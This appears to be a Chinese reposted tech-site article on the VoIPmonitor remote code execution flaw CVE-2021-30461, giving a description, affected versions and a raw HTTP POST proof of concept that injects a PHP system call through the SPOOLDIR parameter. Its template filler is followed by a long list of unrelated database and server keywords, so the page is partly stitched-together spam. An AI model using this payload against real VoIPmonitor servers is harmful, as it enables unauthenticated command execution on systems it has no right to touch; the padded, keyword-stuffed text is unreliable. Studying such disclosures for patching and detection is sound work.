VoIPmonitor 远程命令执行漏洞CVE-2021-30461怎么理解
发表于:2025-01-20 作者:千家信息网编辑
千家信息网最后更新 2025年01月20日,本篇文章为大家展示了VoIPmonitor 远程命令执行漏洞CVE-2021-30461怎么理解,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。一、漏洞描述Vo
千家信息网最后更新 2025年01月20日VoIPmonitor 远程命令执行漏洞CVE-2021-30461怎么理解
本篇文章为大家展示了VoIPmonitor 远程命令执行漏洞CVE-2021-30461怎么理解,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。
一、漏洞描述
VoIPmonitor Web界面用,允许未经身份验证的远程用户触发VoIPmonitor中的远程PHP代码执行漏洞。
二、影响版本
VoIPmonitor < 24.60
三、漏洞复现
访问地址页面:
POC:
POST /index.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeAccept-Language: en-US,en;q=0.5Content-Type: application/x-www-form-urlencoded; charset=UTF-8Content-Length: 49SPOOLDIR=test%22.system%28id%29.%22&recheck=annen
编写尝试脚本:
上述内容就是VoIPmonitor 远程命令执行漏洞CVE-2021-30461怎么理解,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注行业资讯频道。
漏洞
命令
内容
技能
知识
简明
简明扼要
代码
地址
就是
文章
更多
未经
版本
用户
界面
篇文章
脚本
行业
资讯
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
删除数据库int类型的值
成都智能边缘计算服务器报价
电影服务器管理软件
浙江塔式服务器哪家好
生产服务器最大公司
剑网三创建角色数据库
组态软件开发难吗
电脑服务器有病毒吗
网络通但数据库连接不上
校园服务器怎么访问linux
300万数据吞吐量用什么服务器
比赛服务器耗电
服务器无法解析域名
群晖nas企业服务器配置
软件开发工程师高大上的叫法
青岛田鲜生网络技术有限公司
西安专业医疗健康软件开发
计算机网络安全是是一门涉及
查询数据库安全版还是企业版
易语言写入数据库有空格
数据库有什么用处
数据库alter和drop
数据库管理系统技术来源
服务器开启全部端口会怎么样
海德服务器初始密码
广州荔湾网络技术有限公司
威锋网 互联网科技媒体
网络安全2017年新增题
搭建禅道赋予远程数据库权限
广东戴尔服务器生产商